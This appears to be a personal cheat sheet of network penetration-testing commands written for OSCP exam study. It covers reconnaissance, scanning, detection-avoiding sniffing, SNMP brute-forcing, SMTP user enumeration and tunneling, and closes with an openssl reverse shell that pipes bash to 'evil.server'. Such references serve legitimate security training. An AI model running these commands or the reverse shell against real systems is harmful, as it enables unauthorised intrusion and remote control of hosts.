|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     
         |/                

Last changed: 17.12.2018

Network pentesting


I started this commandlist for my Offensive Security Certified Professional exam. It summarizes some means to collect data and exploit vulnerabilities in a target network.

open source information


Search engines and public databases can be helpful to find additional information about the target network as well as email addresses of employees.

search engine research

www.exploit-db.com/google-dorks/
theharvester -d target.com -p all -l 200

dns lookup

dig target.com
dig -t aaaa target.com
dig -t axfr target.com @ns.target.com
fierce -dns target.com
dnsenum -f <dictfile> <domain>

target information

whois <domain>
whois <target_ip>
geoiplookup <target_ip>

bing ip search

ip:<target_ip>

passive network sniffing


If you are inside the network and want to avoid detection passive sniffing will supply information about network clients without any interaction. Make sure that your machine is not requesting an ip via dhcp or sending ipv6 router/neighbor solicitations

preparation

systemclt stop NetworkManager
killall dhclient
sysctl -w net.ipv6.conf.all.autoconf=0
sysctl -w net.ipv6.conf.all.accept_ra=0

dump traffic

tcpdump -i eth0 -X -s 262144 -o dump.pcap

monitor dns requests

passivedns -i eth0 -l /dev/stdout

passive os fingerprinting

p0f -i eth0 -o outfile

traffic analysis

To analyze the tcp streams in a pcap you can use tshark

tshark -r dump.pcap -z conv,tcp -q | sed '1,5d;$d' | awk '{print $10 " " $1 " " $2 " " $3}' | sort -g | awk '{print NR-1,$0}'
tshark -r dump.pcap -z follow,tcp,ascii,0 -q

network scanning


host discovery

nmap -sn 192.168.11.0/24
nmap 192.168.11.0/24 -p 139 -oG grepable_output.txt
unicornscan 192.168.11.0/24:139

portscan

nmap -sS 192.168.11.2 -p1-65535
nmap -sU 192.168.11.2 -p1-65535

os detection

nmap -O -sV 192.168.11.2

finding transparent proxies

nmap -Pn <some_extern_host> --ttl 2 -T5

simple network management protocol


SNMP can be exploited for information gathering and, if you are lucky, to change settings on the host. The community strings of SNMPv1 and SNMPv2c get transmitted in clear text.

guess community string

nmap -Pn -sU <target> -p 161 --script=snmp-brute
onesixtyone -c <dictfile> -i <ip_list>

information gathering

To translate the OIDs in textual form the package snmp-mibs-downloader might be needed.

snmpwalk -c public -v 2c -m ALL <target> 1
snmp-check -c public -v 2c <target>
nmap -Pn -sU <target> -p 161 --script=snmp-interfaces.nse
nmap -Pn -sU <target> -p 161 --script=snmp-processes.nse
nmap -Pn -sU <target> -p 161 --script=snmp-netstat.nse

change settings

snmpset -mALL -v1 -c secret <target> sysName.0 s hacked.host
snmpget -mALL -v1 -c secret <target> sysName.0

preboot execution environment


In an preboot execution environment(pxe) the hosts download boot their operating system from a server in the network. These files can be downloaded manually to examine the content. The needed locations can be found in the dhcp packets.

download pxe binary

tftp <next-server-ip-address>
get <boot-file-name>

extract config file name

strings <boot-file-name> | grep -i tftp -A1
tftp <next-server-ip-address>
get <config file>/default

download kernel and initrd

tftp <next-server-ip-address>
get <vmlinuz-file-from-config>
get <initrd-file-from-config>

mount network block device

modprobe nbd
nbd-client <target> -N /device/name /dev/nbd0 -persist
mount /dev/nbd0 /mnt/nbd

universal plug and play


discover services

echo -e 'M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nMan: "ssdp:discover"\r\nMX: 10\r\nST: upnp:rootdevice\r\n\r\n' | nc -uw 1 <target> 1900
echo -e 'M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nMan: "ssdp:discover"\r\nMX: 10\r\nST: upnp:all\r\n\r\n' | nc -uw 1 <target> 1900

get service control point definition

curl http://192.168.0.1:49000/igddesc.xml

simple object access protocol example

POST /igdupnp/control/WANIPConn1 HTTP/1.1
Accept-Encoding: identity
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress"
Host: 192.168.0.1:49000
Connection: close
Content-Type: text/xml
Content-Length: 300

<?xml version="1.0"?>
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="urn:schemas-upnp-org:service:WANIPConnection:1">
  <s:Body>
    <m:getexternalipaddress xmlns:m="http://schemas.xmlsoap.org/soap/envelope/">
    </m:getexternalipaddress>
   </s:Body>
</s:Envelope>

simple mail transfer protocol


find mail server

dig -t mx <target>

get own domain name

dig -x `curl -s ifconfig.co` | grep -A1 "ANSWER SECTION"

manual tls connect

openssl s_client -connect <target>:<port> -ign_eof
HELO my.domain.name
MAIL FROM: <nobody@tempmail.de>
RCPT TO: <admin@shitmail.de>
DATA
Subject: foobar

Hello,
Bye.
.
QUIT

enumerate users

smtp-user-enum -M RCPT -U <userlist> -D <target.domain> -t <host>

netbios discovery


nbtscan -r 192.168.11.0/24
nmap 192.168.11.2 --script smb-enum-users.nse
nmap 192.168.11.2 --script smb-check-vulns.nse
rpcclient -U "" 192.168.11.2

tunneling


clear to ssl forwarding

socat TCP4-LISTEN:25,fork,reuseaddr OPENSSL:target.com:465,verify=0

IPv4 to IPv6 forwarding

socat TCP4-LISTEN:25,fork,reuseaddr TCP6:target.com:25

local tunnel (opens 31337 on client)

ssh -g -L 31337:target:445 user@ssh-server
plink.exe -g -L 31337:target:445 -l user -pw password ssh-server

remote tunnel (opens 31337 on server)

ssh -g -R 31337:target:445 user@ssh-server
plink.exe -g -R 31337:target:445 -l user -pw password ssh-server

openssl backconnect shell


start server

openssl req -x509 -nodes -sha256 -subj "/CN=evil.server" -newkey rsa:2048 -keyout evil.pem -out evil.pem
openssl s_server -cert evil.pem

start client

mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect evil.server:4433 > /tmp/s; rm /tmp/s